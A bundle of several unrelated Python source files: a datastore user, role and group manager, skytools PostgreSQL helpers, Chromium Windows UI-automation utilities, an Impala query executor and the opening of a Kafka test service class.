            public_keys=sanitize_attribute(ds_user, 'public_keys'),
            sshkey_mod_date=sanitize_attribute(ds_user, 'sshkey_mod_date'),
            groups=sanitize_attribute(ds_user, 'groups'),
            auth_code=sanitize_attribute(ds_user, 'auth_code'),
            auth_code_date=sanitize_attribute(ds_user, 'auth_code_date'))

    def get_role(self, rolename):
        """Return the named Role, or False if it does not exist."""
        ds_role = self.get_ds_entity('usermgmt_roles', rolename)
        if not ds_role:
            return False
        return Role(
            rolename=ds_role.key.name,
            groups=sanitize_attribute(ds_role, 'groups'))

    def get_group(self, groupname):
        """Return the named Group, or False if it does not exist."""
        # Bug fix: the kind here was 'usermgmt_group' (singular) while every
        # other group operation uses 'usermgmt_groups', so lookups always
        # missed entities written by Group.save().
        ds_group = self.get_ds_entity('usermgmt_groups', groupname)
        if not ds_group:
            return False
        return Group(
            groupname=ds_group.key.name,
            gid=sanitize_attribute(ds_group, 'gid'))

    def create_role(self, rolename, groups):
        """Create and persist a role."""
        r = Role(rolename=rolename, groups=groups)
        r.save()
        return r

    def create_group(self, groupname):
        """Create and persist a group with the next free gid."""
        g = Group(groupname=groupname, gid=str(self.get_max_gid()))
        g.save()
        return g

    def create_user(self, username, email, rolename):
        """Create and persist a user, inheriting groups from `rolename`."""
        u = User(
            username=username,
            email=email,
            groups=self.get_role(rolename).groups,
            uidNumber=str(self.get_max_uidNumber()))
        u.save()
        return u

    def delete_role(self, rolename):
        return self.delete_ds_key('usermgmt_roles', rolename)

    def delete_user(self, username):
        return self.delete_ds_key('usermgmt_users', username)

    def delete_group(self, groupname):
        """Remove a group after detaching all of its members."""
        for member in self.get_group_users(groupname):
            self.remove_user_from_group(member, groupname)
        if self.get_group_users(groupname):
            # Somebody is still attached; refuse to delete.
            return False
        return self.delete_ds_key('usermgmt_groups', groupname)

    def add_group_to_role(self, rolename, groupname):
        """Add a group to a role; returns False if it was already present."""
        r = self.get_role(rolename)
        if groupname in r.groups:
            return False
        r.groups.add(groupname)
        r.save()
        return True

    def remove_group_from_role(self, rolename, groupname):
        """Remove a group from a role; returns False if it was not present."""
        r = self.get_role(rolename)
        if groupname not in r.groups:
            return False
        r.groups.remove(groupname)
        r.save()
        return True

    def add_user_to_group(self, username, groupname):
        """Add a user to a group; returns False if already a member."""
        u = self.get_user(username)
        if groupname in u.groups:
            return False
        u.groups.add(groupname)
        u.save()
        return True

    def remove_user_from_group(self, username, groupname):
        """Remove a user from a group; returns False if not a member."""
        u = self.get_user(username)
        if groupname not in u.groups:
            return False
        u.groups.remove(groupname)
        u.save()
        return True

    def get_group_users(self, groupname):
        """Return usernames of all members of `groupname`."""
        return [u.username for u in self.get_users() if groupname in u.groups]

    def get_max_gid(self):
        """Return the next free gid (numeric max + 1), or 9000 if none exist.

        Bug fix: gids are stored as strings; the original compared them
        lexicographically (so '9000' > '10000').  Convert before max().
        """
        try:
            return max(int(group.gid) for group in self.get_groups()) + 1
        except ValueError:  # no groups, or a non-numeric gid
            return 9000

    def get_max_uidNumber(self):
        """Return the next free uid (numeric max + 1), or 2500 if none exist."""
        try:
            return max(int(user.uidNumber) for user in self.get_users()) + 1
        except ValueError:  # no users, or a non-numeric uidNumber
            return 2500
| |
"""Database tools."""
import os
from cStringIO import StringIO
from skytools.quoting import quote_copy, quote_literal, quote_ident, quote_fqident
import skytools.installer_config
__all__ = [
"fq_name_parts", "fq_name", "get_table_oid", "get_table_pkeys",
"get_table_columns", "exists_schema", "exists_table", "exists_type",
"exists_function", "exists_language", "Snapshot", "magic_insert",
"CopyPipe", "full_copy", "DBObject", "DBSchema", "DBTable", "DBFunction",
"DBLanguage", "db_install", "installer_find_file", "installer_apply_file",
"dbdict", "mk_insert_sql", "mk_update_sql", "mk_delete_sql",
]
class dbdict(dict):
    """dict subclass whose keys are also readable and writable as attributes."""

    def __getattr__(self, key):
        # obj.foo reads self['foo']
        return self[key]

    def __setattr__(self, key, value):
        self[key] = value

    def __delattr__(self, key):
        del self[key]
#
# Fully qualified table name
#
def fq_name_parts(tbl):
    "Return fully qualified name parts."
    parts = tbl.split('.', 1)
    if len(parts) == 2:
        return parts
    if len(parts) == 1:
        # no schema given; default to public
        return ('public', tbl)
    raise Exception('Syntax error in table name:'+tbl)
def fq_name(tbl):
    "Return fully qualified name."
    schema, name = fq_name_parts(tbl)
    return "%s.%s" % (schema, name)
#
# info about table
#
def get_table_oid(curs, table_name):
    """Return the pg_class oid of the table, raising if it does not exist."""
    schema, name = fq_name_parts(table_name)
    q = """select c.oid from pg_namespace n, pg_class c
            where c.relnamespace = n.oid
            and n.nspname = %s and c.relname = %s"""
    curs.execute(q, [schema, name])
    rows = curs.fetchall()
    if not rows:
        raise Exception('Table not found: '+table_name)
    return rows[0][0]
def get_table_pkeys(curs, tbl):
    """Return the primary-key column names of `tbl`, in index order."""
    oid = get_table_oid(curs, tbl)
    q = "SELECT k.attname FROM pg_index i, pg_attribute k"\
        " WHERE i.indrelid = %s AND k.attrelid = i.indexrelid"\
        " AND i.indisprimary AND k.attnum > 0 AND NOT k.attisdropped"\
        " ORDER BY k.attnum"
    curs.execute(q, [oid])
    return [row[0] for row in curs.fetchall()]
def get_table_columns(curs, tbl):
    """Return all live column names of `tbl`, in attribute order."""
    oid = get_table_oid(curs, tbl)
    q = "SELECT k.attname FROM pg_attribute k"\
        " WHERE k.attrelid = %s"\
        " AND k.attnum > 0 AND NOT k.attisdropped"\
        " ORDER BY k.attnum"
    curs.execute(q, [oid])
    return [row[0] for row in curs.fetchall()]
#
# exist checks
#
def exists_schema(curs, schema):
    """Return a non-zero count if the schema exists."""
    curs.execute("select count(1) from pg_namespace where nspname = %s",
                 [schema])
    return curs.fetchone()[0]
def exists_table(curs, table_name):
    """Return a non-zero count if a regular table with this name exists."""
    schema, name = fq_name_parts(table_name)
    q = """select count(1) from pg_namespace n, pg_class c
            where c.relnamespace = n.oid and c.relkind = 'r'
            and n.nspname = %s and c.relname = %s"""
    curs.execute(q, [schema, name])
    return curs.fetchone()[0]
def exists_type(curs, type_name):
    """Return a non-zero count if a type with this name exists."""
    schema, name = fq_name_parts(type_name)
    q = """select count(1) from pg_namespace n, pg_type t
            where t.typnamespace = n.oid
            and n.nspname = %s and t.typname = %s"""
    curs.execute(q, [schema, name])
    return curs.fetchone()[0]
def exists_function(curs, function_name, nargs):
    """Return a non-zero count if a function with this name/arg-count exists.

    Argument types are not checked, so several overloads may match.  An
    unqualified name that is not found is retried against pg_catalog.
    """
    schema, name = fq_name_parts(function_name)
    q = """select count(1) from pg_namespace n, pg_proc p
            where p.pronamespace = n.oid and p.pronargs = %s
            and n.nspname = %s and p.proname = %s"""
    curs.execute(q, [nargs, schema, name])
    res = curs.fetchone()
    if not res[0] and function_name.find('.') < 0:
        # unqualified and not found: also check builtin functions
        return exists_function(curs, "pg_catalog." + function_name, nargs)
    return res[0]
def exists_language(curs, lang_name):
    """Return a non-zero count if the procedural language is installed."""
    q = """select count(1) from pg_language
            where lanname = %s"""
    curs.execute(q, [lang_name])
    return curs.fetchone()[0]
#
# Support for PostgreSQL snapshot
#
class Snapshot(object):
    "Represents a PostgreSQL snapshot."

    def __init__(self, str):
        "Create snapshot from string."
        self.sn_str = str
        parts = str.split(':')
        if len(parts) != 3:
            raise Exception('Unknown format for snapshot')
        self.xmin = int(parts[0])
        self.xmax = int(parts[1])
        # third field: comma-separated list of in-progress txids
        self.txid_list = [int(s) for s in parts[2].split(',')] if parts[2] else []

    def contains(self, txid):
        "Is txid visible in snapshot."
        txid = int(txid)
        if txid < self.xmin:
            return True
        if txid >= self.xmax:
            return False
        # between xmin and xmax: visible unless still in progress
        return txid not in self.txid_list
#
# Copy helpers
#
def _gen_dict_copy(tbl, row, fields, qfields):
    """Render one dict row as a tab-separated COPY line."""
    return "\t".join([quote_copy(row.get(f)) for f in fields])
def _gen_dict_insert(tbl, row, fields, qfields):
    """Render one dict row as an INSERT statement."""
    vals = [quote_literal(row.get(f)) for f in fields]
    return "insert into %s (%s) values (%s);" % (
        tbl, ",".join(qfields), ",".join(vals))
def _gen_list_copy(tbl, row, fields, qfields):
    """Render one list/tuple row as a tab-separated COPY line."""
    return "\t".join([quote_copy(row[i]) for i in range(len(fields))])
def _gen_list_insert(tbl, row, fields, qfields):
    """Render one list/tuple row as an INSERT statement."""
    vals = [quote_literal(row[i]) for i in range(len(fields))]
    return "insert into %s (%s) values (%s);" % (
        tbl, ",".join(qfields), ",".join(vals))
def magic_insert(curs, tablename, data, fields = None, use_insert = 0):
    """Copy/insert a list of dict/list data to database.

    If curs == None, then the copy or insert statements are returned
    as string. For list of dict the field list is optional, as its
    possible to guess them from dict keys.
    """
    if len(data) == 0:
        return

    # pick a row renderer based on data shape and requested mode
    if hasattr(data[0], 'keys'):
        if fields == None:
            fields = data[0].keys()
        row_func = _gen_dict_insert if use_insert else _gen_dict_copy
    else:
        if fields == None:
            raise Exception("Non-dict data needs field list")
        row_func = _gen_list_insert if use_insert else _gen_list_copy

    qfields = [quote_ident(f) for f in fields]
    qtablename = quote_fqident(tablename)

    # render all rows into one buffer
    buf = StringIO()
    if curs == None and use_insert == 0:
        buf.write("COPY %s (%s) FROM STDIN;\n" % (qtablename, ",".join(qfields)))
    for row in data:
        buf.write(row_func(qtablename, row, fields, qfields))
        buf.write("\n")

    # if user needs only string, return it
    if curs == None:
        if use_insert == 0:
            buf.write("\\.\n")
        return buf.getvalue()

    # do the actual copy/inserts
    if use_insert:
        curs.execute(buf.getvalue())
    else:
        buf.seek(0)
        curs.copy_from(buf, "%s (%s)" % (qtablename, ",".join(qfields)))
#
# Full COPY of table from one db to another
#
class CopyPipe(object):
    """Splits one big COPY to chunks.

    Acts as a write()-able target for psycopg's copy_to()/copy_expert():
    buffers incoming COPY text and flushes it to `dstcurs` whenever the
    buffer exceeds `limit` bytes, always splitting at a row boundary.
    `cancel_func`, if given, is invoked at the start of every flush so the
    caller can abort a long copy.
    """
    def __init__(self, dstcurs, tablename = None, limit = 512*1024, cancel_func=None, sql_from = None):
        self.tablename = tablename
        self.sql_from = sql_from
        self.dstcurs = dstcurs
        self.buf = StringIO()
        self.limit = limit
        # Bug fix: the parameter was previously discarded
        # (self.cancel_func = None), so the cancellation hook never ran.
        self.cancel_func = cancel_func
        self.total_rows = 0
        self.total_bytes = 0

    def write(self, data):
        "New data from psycopg"
        self.total_bytes += len(data)
        self.total_rows += data.count("\n")
        if self.buf.tell() >= self.limit:
            pos = data.find('\n')
            if pos >= 0:
                # split at newline so a row is never cut in half
                p1 = data[:pos + 1]
                p2 = data[pos + 1:]
                self.buf.write(p1)
                self.flush()
                data = p2
        self.buf.write(data)

    def flush(self):
        "Send data out."
        if self.cancel_func:
            self.cancel_func()
        if self.buf.tell() <= 0:
            return
        self.buf.seek(0)
        if self.sql_from:
            self.dstcurs.copy_expert(self.sql_from, self.buf)
        else:
            self.dstcurs.copy_from(self.buf, self.tablename)
        self.buf.seek(0)
        self.buf.truncate()
def full_copy(tablename, src_curs, dst_curs, column_list = []):
    """COPY table from one db to another."""
    qtable = quote_fqident(tablename)
    if column_list:
        qcols = [quote_ident(c) for c in column_list]
        hdr = "%s (%s)" % (qtable, ",".join(qcols))
    else:
        hdr = qtable
    if hasattr(src_curs, 'copy_expert'):
        # modern psycopg: stream through COPY ... TO/FROM stdout
        pipe = CopyPipe(dst_curs, sql_from = "COPY %s FROM stdout" % hdr)
        src_curs.copy_expert("COPY %s TO stdout" % hdr, pipe)
    else:
        pipe = CopyPipe(dst_curs, hdr)
        src_curs.copy_to(pipe, hdr)
    pipe.flush()
    return (pipe.total_bytes, pipe.total_rows)
#
# SQL installer
#
class DBObject(object):
    """Base class for installable DB objects."""
    name = None
    sql = None
    sql_file = None

    def __init__(self, name, sql = None, sql_file = None):
        self.name = name
        self.sql = sql
        self.sql_file = sql_file

    def create(self, curs, log = None):
        """Execute this object's SQL (inline or loaded from file) on curs."""
        if log:
            log.info('Installing %s' % self.name)
        if self.sql:
            sql = self.sql
        elif self.sql_file:
            fn = self.find_file()
            if log:
                log.info(" Reading from %s" % fn)
            sql = open(fn, "r").read()
        else:
            raise Exception('object not defined')
        for stmt in skytools.parse_statements(sql):
            curs.execute(stmt)

    def find_file(self):
        """Locate sql_file on disk, searching the configured SQL locations."""
        if self.sql_file[0] == "/":
            # absolute path is taken as-is
            return self.sql_file
        for dir in skytools.installer_config.sql_locations:
            fn = os.path.join(dir, self.sql_file)
            if os.path.isfile(fn):
                return fn
        raise Exception('File not found: '+self.sql_file)
class DBSchema(DBObject):
    """Handles db schema."""
    def exists(self, curs):
        """Return a non-zero count if the schema already exists."""
        return exists_schema(curs, self.name)
class DBTable(DBObject):
    """Handles db table."""
    def exists(self, curs):
        """Return a non-zero count if the table already exists."""
        return exists_table(curs, self.name)
class DBFunction(DBObject):
    """Handles db function."""
    def __init__(self, name, nargs, sql = None, sql_file = None):
        # nargs is needed for the existence check: pg_proc is matched by
        # name plus argument count.
        DBObject.__init__(self, name, sql, sql_file)
        self.nargs = nargs
    def exists(self, curs):
        """Return a non-zero count if a matching function already exists."""
        return exists_function(curs, self.name, self.nargs)
class DBLanguage(DBObject):
    """Handles db language."""
    def __init__(self, name):
        # The install SQL is generated from the language name itself.
        DBObject.__init__(self, name, sql = "create language %s" % name)
    def exists(self, curs):
        """Return a non-zero count if the language is already installed."""
        return exists_language(curs, self.name)
def db_install(curs, list, log = None):
    """Installs list of objects into db."""
    for obj in list:
        if obj.exists(curs):
            # already present; nothing to do
            if log:
                log.info('%s is installed' % obj.name)
        else:
            obj.create(curs, log)
def installer_find_file(filename):
    """Locate `filename`, searching cwd and the configured SQL locations.

    Absolute paths are only accepted if the file actually exists.
    """
    if filename[0] == "/":
        if os.path.isfile(filename):
            return filename
    else:
        for dir in ["."] + skytools.installer_config.sql_locations:
            fn = os.path.join(dir, filename)
            if os.path.isfile(fn):
                return fn
    raise Exception('File not found: '+filename)
def installer_apply_file(db, filename, log):
    """Run every statement from the given SQL file on a fresh cursor."""
    path = installer_find_file(filename)
    sql_text = open(path, "r").read()
    if log:
        log.info("applying %s" % path)
    cursor = db.cursor()
    for statement in skytools.parse_statements(sql_text):
        cursor.execute(statement)
#
# Generate INSERT/UPDATE/DELETE statement
#
def mk_insert_sql(row, tbl, pkey_list = None, field_map = None):
    """Generate INSERT statement from dict data."""
    if field_map:
        # remap source keys to destination column names
        pairs = [(dst, row[src]) for src, dst in field_map.iteritems()]
    else:
        pairs = row.items()
    col_str = ", ".join([quote_ident(c) for c, v in pairs])
    val_str = ", ".join([quote_literal(v) for c, v in pairs])
    return "insert into %s (%s) values (%s);" % (
            quote_fqident(tbl), col_str, val_str)
def mk_update_sql(row, tbl, pkey_list, field_map = None):
    """Generate UPDATE statement from dict data."""
    if len(pkey_list) < 1:
        raise Exception("update needs pkeys")
    # WHERE clause from the primary keys (renamed via field_map if given)
    whe_list = []
    pkmap = {}
    for k in pkey_list:
        pkmap[k] = 1
        dst = field_map[k] if field_map else k
        whe_list.append("%s = %s" % (quote_ident(dst), quote_literal(row[k])))
    # SET clause from everything that is not a primary key
    set_list = []
    if field_map:
        for src, dst in field_map.iteritems():
            if src not in pkmap:
                set_list.append("%s = %s" % (quote_ident(dst),
                                             quote_literal(row[src])))
    else:
        for col, val in row.iteritems():
            if col not in pkmap:
                set_list.append("%s = %s" % (quote_ident(col),
                                             quote_literal(val)))
    return "update %s set %s where %s;" % (quote_fqident(tbl),
            ", ".join(set_list), " and ".join(whe_list))
def mk_delete_sql(row, tbl, pkey_list, field_map = None):
    """Generate DELETE statement from dict data."""
    if len(pkey_list) < 1:
        raise Exception("delete needs pkeys")
    conds = []
    for k in pkey_list:
        dst = field_map[k] if field_map else k
        conds.append("%s = %s" % (quote_ident(dst), quote_literal(row[k])))
    return "delete from %s where %s;" % (quote_fqident(tbl),
                                         " and ".join(conds))
| |
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import time
import pythoncom
import pywintypes
import win32api
import win32com
import win32com.client
import win32con
import win32gui
import win32process
import winerror
class _MessageQueueAttacher(object):
  """Wrapper class for message queue attachment."""

  def __enter__(self):
    """Attaches the current thread to the foreground window's message queue.

    This is an old and well known exploit used to bypass Windows Focus rules:
    http://www.google.com/search?q=attachthreadinput+setforegroundwindow
    """
    self._active_thread_id = 0
    foreground = win32gui.GetForegroundWindow()
    if not foreground:
      logging.warning('No active window is found.')
      return
    my_thread = win32api.GetCurrentThreadId()
    owner_thread, _ = win32process.GetWindowThreadProcessId(foreground)
    win32process.AttachThreadInput(my_thread, owner_thread, 1)
    logging.info('Attached current thread input %s to active thread: %s',
                 my_thread, owner_thread)
    # Remember the id so __exit__ can detach; 0 means nothing to undo.
    self._active_thread_id = owner_thread

  def __exit__(self, unused_type, unused_value, unused_traceback):
    """Detaches the current thread from the active thread's message queue."""
    if not self._active_thread_id:
      return
    my_thread = win32api.GetCurrentThreadId()
    win32process.AttachThreadInput(my_thread, self._active_thread_id, 0)
    logging.info('Detached current thread input %s from thread: %s',
                 my_thread, self._active_thread_id)
def SetForegroundWindow(hwnd):
  """Brings the given window to foreground.

  Args:
    hwnd: Handle of the window to bring to the foreground.
  """
  with _MessageQueueAttacher():
    result = win32gui.SetForegroundWindow(hwnd)
  return bool(result)
def FindWindowsWithText(parent, text_to_search):
  """Finds windows with given text.

  Args:
    parent: Handle to the parent window whose child windows are to be searched.
    text_to_search: Substring to search within Windows text, case-insensitive.

  Returns:
    A list of HWND that match the search condition.
  """
  matches = []
  needle = text_to_search.lower()

  def _OnWindow(hwnd, _):
    # EnumChildWindows callback: keep windows whose text contains the needle.
    if needle in win32gui.GetWindowText(hwnd).lower():
      matches.append(hwnd)

  try:
    win32gui.EnumChildWindows(parent, _OnWindow, None)
  except pywintypes.error as e:
    logging.info('Error while searching [%s], error: [%s]', text_to_search, e)
  return matches
def FindWindowsWithTitle(title_to_search):
  """Finds windows with given title.

  Args:
    title_to_search: Window title substring to search, case-insensitive.

  Returns:
    A list of HWND that match the search condition.
  """
  # A None parent makes EnumChildWindows walk the desktop's children,
  # i.e. all top-level windows.
  return FindWindowsWithText(None, title_to_search)
def FindWindow(title, class_name, parent=0, child_after=0):
  """Finds a window of a given title and class.

  Args:
    title: Title of the window to search.
    class_name: Class name of the window to search.
    parent: Handle to the parent window whose child windows are to be searched.
    child_after: HWND to a child window. Search begins with the next child
        window in the Z order.

  Returns:
    Handle of the found window, or 0 if not found.
  """
  hwnd = 0
  try:
    hwnd = win32gui.FindWindowEx(
        int(parent), int(child_after), class_name, title)
  except win32gui.error as err:
    # Bug fix: the module name was misspelled 'winrror', which raised a
    # NameError whenever FindWindowEx failed; also, pywintypes errors are
    # not indexable on Python 3, so read the .winerror attribute instead
    # of err[0].
    if err.winerror == winerror.ERROR_INVALID_WINDOW_HANDLE:  # Could be closed.
      pass
    elif err.winerror != winerror.ERROR_FILE_NOT_FOUND:
      raise
  if hwnd:
    win32gui.FlashWindow(hwnd, True)
  return hwnd
def FindWindowWithTitleAndText(title, text):
  """Checks if any window has the given title and a child window with text.

  Args:
    title: Expected window title.
    text: Expected window text substring(in any child window), case-insensitive.

  Returns:
    A list of HWND that meet the search condition.
  """
  candidates = FindWindowsWithTitle(title)
  if not candidates:
    logging.info('No window has title: [%s].', title)
  return [hwnd for hwnd in candidates if FindWindowsWithText(hwnd, text)]
def WaitForWindow(title, class_name, timeout=30):
  """Waits for window with given title and class to appear.

  Args:
    title: Windows title to search.
    class_name: Class name of the window to search.
    timeout: How long should wait before give up.

  Returns:
    A tuple of (HWND, title) of the found window, or (None, None) otherwise.
  """
  logging.info('ui.WaitForWindow("%s", "%s") for %s seconds', title,
               class_name, timeout)
  start = time.perf_counter()
  deadline = start + int(timeout)
  while time.perf_counter() < deadline:
    hwnd = FindWindow(title, class_name)
    if hwnd:
      logging.info('Window ["%s"] found in %f seconds', title,
                   time.perf_counter() - start)
      return (hwnd, title)
    logging.info('Window with title [%s] has not appeared yet.', title)
    time.sleep(0.5)
  logging.warning('WARNING: (%s,"%s") not found within %f seconds', title,
                  class_name, timeout)
  return (None, None)
def ClickButton(button_hwnd):
  """Clicks a button window by sending a BM_CLICK message.

  Per http://msdn2.microsoft.com/en-us/library/bb775985.aspx
  "If the button is in a dialog box and the dialog box is not active, the
  BM_CLICK message might fail. To ensure success in this situation, call
  the SetActiveWindow function to activate the dialog box before sending
  the BM_CLICK message to the button."

  Args:
    button_hwnd: HWND to the button to be clicked.
  """
  previously_active = win32gui.SetActiveWindow(button_hwnd)
  win32gui.PostMessage(button_hwnd, win32con.BM_CLICK, 0, 0)
  if previously_active:
    # Restore whatever window was active before the click.
    win32gui.SetActiveWindow(previously_active)
def ClickChildButtonWithText(parent_hwnd, button_text):
  """Clicks a child button window with given text.

  Args:
    parent_hwnd: HWND of the button parent.
    button_text: Button windows title.

  Returns:
    Whether button is clicked.
  """
  hwnd = FindWindow(button_text, 'Button', parent_hwnd)
  if not hwnd:
    logging.debug('No button with [%s] found.', button_text)
    return False
  logging.debug('Found child button with: %s', button_text)
  ClickButton(hwnd)
  return True
def SendKeyToWindow(hwnd, key_to_press):
  """Sends a key press to the window.

  This is a blocking call until all keys are pressed.

  Args:
    hwnd: handle of the window to press key.
    key_to_press: Actual key to send to window. eg.'{Enter}'. See WScript.Shell
        SendKeys documentation for key definitions.
  """
  try:
    shell = win32com.client.Dispatch('WScript.Shell')
    # Focus the target window first, then route keys to the foreground app.
    SetForegroundWindow(hwnd)
    shell.AppActivate(str(win32gui.GetForegroundWindow()))
    shell.SendKeys(key_to_press)
    logging.info('Sent %s to window %x.', key_to_press, hwnd)
  except pywintypes.error as err:
    logging.error('Failed to press key: %s', err)
    raise
  except pythoncom.com_error as err:
    logging.error('COM exception occurred: %s, is CoInitialize() called?', err)
    raise
| |
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Module used for executing queries and gathering results.
# The QueryExecutor is meant to be generic and doesn't
# have the knowledge of how to actually execute a query. It takes a query and its config
# and executes is against a executor function.
# For example (in pseudo-code):
#
# def exec_func(query, config):
# ...
#
# config = ImpalaBeeswaxQueryExecConfig()
# executor = QueryExecutor('beeswax', query, config, exec_func)
# executor.run()
# result = executor.result
import logging
import os
from tests.beeswax.impala_beeswax import ImpalaBeeswaxClient, ImpalaBeeswaxResult
from tests.performance.query import Query, HiveQueryResult, ImpalaQueryResult
from impala.dbapi import connect as connect_to_impala
# Setup logging for this module.
logging.basicConfig(level=logging.INFO, format='[%(name)s] %(threadName)s: %(message)s')
LOG = logging.getLogger('query_executor')
LOG.setLevel(level=logging.INFO)
# globals.
hive_result_regex = 'Time taken: (\d*).(\d*) seconds'
## TODO: Split executors into their own modules.
class QueryExecConfig(object):
  """Base Class for Execution Configs.

  Attributes:
    plugin_runner (PluginRunner?): optional runner for execution plugins.
  """

  def __init__(self, plugin_runner=None):
    self.plugin_runner = plugin_runner
class ImpalaQueryExecConfig(QueryExecConfig):
  """Base class for Impala query execution config.

  Attributes:
    impalad (str): address of impalad <host>:<port>
  """

  def __init__(self, plugin_runner=None, impalad='localhost:21000'):
    super(ImpalaQueryExecConfig, self).__init__(plugin_runner=plugin_runner)
    self._impalad = impalad

  @property
  def impalad(self):
    """Address of the impalad this config points at."""
    return self._impalad

  @impalad.setter
  def impalad(self, value):
    self._impalad = value
class JdbcQueryExecConfig(ImpalaQueryExecConfig):
  """Impala query execution config for jdbc.

  Attributes:
    transport (?): transport to pass to the jdbc client (-t flag).
  """

  JDBC_CLIENT_PATH = os.path.join(os.environ['IMPALA_HOME'], 'bin/run-jdbc-client.sh')

  def __init__(self, plugin_runner=None, impalad='localhost:21050', transport=None):
    super(JdbcQueryExecConfig, self).__init__(plugin_runner=plugin_runner,
                                              impalad=impalad)
    self.transport = transport

  @property
  def jdbc_client_cmd(self):
    """The args to run the jdbc client.

    Constructed on the fly, since the impalad it points to can change.
    """
    return '%s -i "%s" -t %s' % (JdbcQueryExecConfig.JDBC_CLIENT_PATH,
                                 self._impalad, self.transport)
class ImpalaHS2QueryConfig(ImpalaQueryExecConfig):
  """Impala query execution config for the HS2 interface."""

  def __init__(self, use_kerberos=False, impalad="localhost:21050", plugin_runner=None):
    super(ImpalaHS2QueryConfig, self).__init__(plugin_runner=plugin_runner,
                                               impalad=impalad)
    # TODO Use a config dict for query execution options similar to HS2
    self.use_kerberos = use_kerberos
class HiveHS2QueryConfig(QueryExecConfig):
  """Hive query execution config for the HS2 interface."""

  def __init__(self,
               plugin_runner=None,
               exec_options = None,
               use_kerberos=False,
               user=None,
               hiveserver='localhost'):
    super(HiveHS2QueryConfig, self).__init__()
    self.exec_options = dict()
    self._build_options(exec_options)
    self.use_kerberos = use_kerberos
    self.user = user
    self.hiveserver = hiveserver

  def _build_options(self, exec_options):
    """Read the exec_options into self.exec_options

    Args:
      exec_options (str): String formatted as "command1;command2"
    """
    if not exec_options:
      return
    # exec_options are seperated by ; on the command line
    for option in exec_options.split(';'):
      key, value = option.split(':')
      # The keys in HiveService QueryOptions are lower case.
      self.exec_options[key.lower()] = value
class BeeswaxQueryExecConfig(ImpalaQueryExecConfig):
  """Impala query execution config for beeswax

  Args:
    use_kerberos (boolean)
    exec_options (str): String formatted as "opt1:val1;opt2:val2"
    impalad (str): address of impalad <host>:<port>
    plugin_runner (?): ?

  Attributes:
    use_kerberos (boolean)
    exec_options (dict str -> str): execution options
  """

  def __init__(self, use_kerberos=False, exec_options=None, impalad='localhost:21000',
               plugin_runner=None):
    super(BeeswaxQueryExecConfig, self).__init__(plugin_runner=plugin_runner,
                                                 impalad=impalad)
    self.use_kerberos = use_kerberos
    self.exec_options = dict()
    self._build_options(exec_options)

  def _build_options(self, exec_options):
    """Read the exec_options into self.exec_options

    Args:
      exec_options (str): String formatted as "opt1:val1;opt2:val2"
    """
    if not exec_options:
      return
    # exec_options are seperated by ; on the command line
    for option in exec_options.split(';'):
      key, value = option.split(':')
      # The keys in ImpalaService QueryOptions are upper case.
      self.exec_options[key.upper()] = value
class QueryExecutor(object):
  """Executes a query.

  Args:
    name (str): eg. "hive"
    query (str): string containing SQL query to be executed
    func (function): Function that accepts a QueryExecOption parameter and
      returns a ImpalaQueryResult. Eg. execute_using_impala_beeswax
    config (QueryExecOption)
    exit_on_error (boolean): Exit right after an error encountered.

  Attributes:
    exec_func (function): as `func` above.
    exec_config (QueryExecOption)
    query (str): string containing SQL query to be executed
    exit_on_error (boolean): Exit right after an error encountered.
    executor_name (str): eg. "hive"
    result (ImpalaQueryResult): Contains the result after execute is called.
  """

  def __init__(self, name, query, func, config, exit_on_error):
    self.executor_name = name
    self.query = query
    self.exec_func = func
    self.exec_config = config
    self.exit_on_error = exit_on_error
    self._result = None

  def prepare(self, impalad):
    """Prepare the query to be run.

    For now, this sets the impalad that the query connects to. If the executor
    is hive, it's a no op.
    """
    if 'hive' not in self.executor_name:
      self.exec_config.impalad = impalad

  def execute(self):
    """Execute the query using the given execution function"""
    LOG.debug('Executing %s' % self.query)
    self._result = self.exec_func(self.query, self.exec_config)
    if not self._result.success:
      if self.exit_on_error:
        raise RuntimeError(self._result.query_error)
      LOG.info("Continuing execution")

  @property
  def result(self):
    """The ImpalaQueryResult of the most recent execute() call."""
    return self._result
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import os.path
import re
import signal
import time
from ducktape.services.service import Service
from ducktape.utils.util import wait_until
from ducktape.cluster.remoteaccount import RemoteCommandError
from config import KafkaConfig
from kafkatest.directory_layout.kafka_path import KafkaPathResolverMixin
from kafkatest.services.kafka import config_property
from kafkatest.services.monitor.jmx import JmxMixin
from kafkatest.services.security.minikdc import MiniKdc
from kafkatest.services.security.security_config import SecurityConfig
from kafkatest.version import DEV_BRANCH, LATEST_0_10_0
Port = collections.namedtuple('Port', ['name', 'number', 'open'])
class KafkaService(KafkaPathResolverMixin, JmxMixin, Service):
    """Ducktape service that provisions and manages a Kafka broker cluster."""
    # All broker state (configs, logs, data) lives under this directory.
    PERSISTENT_ROOT = "/mnt/kafka"
    STDOUT_STDERR_CAPTURE = os.path.join(PERSISTENT_ROOT, "server-start-stdout-stderr.log")
    LOG4J_CONFIG = os.path.join(PERSISTENT_ROOT, "kafka-log4j.properties")
    # Logs such as controller.log, server.log, etc all go here
    OPERATIONAL_LOG_DIR = os.path.join(PERSISTENT_ROOT, "kafka-operational-logs")
    OPERATIONAL_LOG_INFO_DIR = os.path.join(OPERATIONAL_LOG_DIR, "info")
    OPERATIONAL_LOG_DEBUG_DIR = os.path.join(OPERATIONAL_LOG_DIR, "debug")
    # Kafka log segments etc go here
    DATA_LOG_DIR_PREFIX = os.path.join(PERSISTENT_ROOT, "kafka-data-logs")
    DATA_LOG_DIR_1 = "%s-1" % (DATA_LOG_DIR_PREFIX)
